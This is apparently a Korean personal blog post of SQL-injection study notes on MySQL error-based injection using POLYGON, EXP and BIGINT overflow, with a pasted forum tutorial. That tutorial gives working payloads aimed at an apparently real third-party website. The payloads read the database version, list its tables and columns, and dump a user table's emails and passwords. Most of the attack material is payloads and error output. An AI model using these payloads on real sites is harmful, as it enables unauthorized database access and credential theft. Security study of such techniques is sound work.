http://frostyhacks.blogspot.kr/2014/10/one-sqli-to-rule-them-all.html
polygon에서 sql문 실행 가능함.
mysql> select POLYGON(12.33 12.55,13.55; select id from prob;);
ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MySQL serv
er version for the right syntax to use near '12.55,13.55' at line 1
+-------+
| id |
+-------+
| guest |
| admin |
+-------+
2 rows in set (0.00 sec)
근데 php의 mysql_query같이 일반적인 함수에서는 하나이상의 쿼리를 실행못하기 때문에 별로 의미는 없을듯.
아래가 글을 쓰게 된 주 주제이다.
polygon으로 error based sqli가 가능하다.
http://frostyhacks.blogspot.kr/2014/11/error-you-have-sqli-in-your-polygons.html
이거 엄청 쓸모있을거 같은데 현재 버전으로는 안된다. 5.1.41
http://ethicalhacking786.blogspot.kr/2015/05/Error-base-tutorials.html
같이보기.
https://rstforums.com/forum/94842-sqli-polygons.rst
여기도.
다 에러가 동일하게 뜬다는데 난 안뜬다.(null값이 나오거나 그냥 syntax error가 발생함.)
추가.
버전이 아마 5.5이상이 되어야될것 같다.
MULTILINESTRING, GEOMETRYCOLLECTION 으로도 sqli가 가능하다는 소리같은데 현재 내 mysql버전에서는 안된다.
나중을 위해서 페이지 전부를 복사해옴.
maybe some of you heard, or maybe not, but theres a new type of error based in mysql.
discoverd about a week ago.
this method called "non-geometric error based".
lets start.
this method based on the function polygon().
in a nutshell, this function constructs geometry collection.
the vuln thing about it, that it can only work with the function point().
for example-
SELECT polygon(point(53,12));not really exciting, ah?
for those who know a bit geometry, it goes like point(x,y).
now look whats happend when we dont use point()-
SELECT polygon(53,12);
Error 1367 (22007): Illegal non geometric '53' value found during parsingso lets think a bit.
if the error returns our string input as an string output, what would happend if we try to run a query?
SELECT polygon((select*from(select*from(select@@version)f)x));
Error 1367 (22007): Illegal non geometric '(select `x`.`@@version` from (select '5.5.38-35.2' AS `@@version` from dual) `x`)' value found during parsingconditions:
mysql_error on.
lets get the version-
http://www.thepernodship.co.uk/users/view.php?id=polygon((select*from(select*from(select@@version)f)x))nice, but can we extract more?
hell yeah.
we will be using this to get tables-
http://www.thepernodship.co.uk/users/view.php?id=polygon((select*from(select*from(select group_concat(table_name) from information_schema.tables where table_schema=database())f)x))im interested in the table pernoduser, lets get columns-
http://www.thepernodship.co.uk/users/view.php?id=polygon((select*from(select*from(select group_concat(column_name) from information_schema.columns where table_name='pernoduser' )f)x))and dump the table-
http://www.thepernodship.co.uk/users/view.php?id=polygon((select*from(select*from(select group_concat(email,0x3a,password) from pernoduser)f)x))to overpower the 'cut results', we can just add a condition in the end, " where email>last-email ".
hope you learned something
하나 더있다.
exp를 사용해서 error based sql injection이 가능하다고 한다. 단점은 mysql버전이 5.5.5이상이어야 한다고 한다.
https://osandamalith.wordpress.com/2015/07/15/error-based-sql-injection-using-exp/
mysql> select exp(~(select*from(select user())x));ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select 'root@localhost' from dual)))'
아래는 integer overflow를 이용한 에러 기반 인젝션이라고 한다. 이걸 기반으로 위의 exp()를 이용한 인젝션방법을 만듬.
https://osandamalith.wordpress.com/2015/07/08/bigint-overflow-error-based-sql-injection/
mysql> select ~0+!(select*from(select user())x);ERROR 1690 (22003): BIGINT value is out of range in '(~(0) + (not((select 'root@localhost' from dual))))'
'webhacking > sql, sql injection' 카테고리의 다른 글
| sqli관련 작은 팁 (0) | 2015.09.28 |
|---|---|
| codeshell.kr adm1nkyj board (0) | 2015.08.28 |
| WeChall Table Names, Table Names II, Order By Query (0) | 2015.08.15 |
| adm1nkyj님 워게임 prob 6 (codeshell.kr union sqli?) (0) | 2015.08.13 |
| codeshell.kr authorization (0) | 2015.08.08 |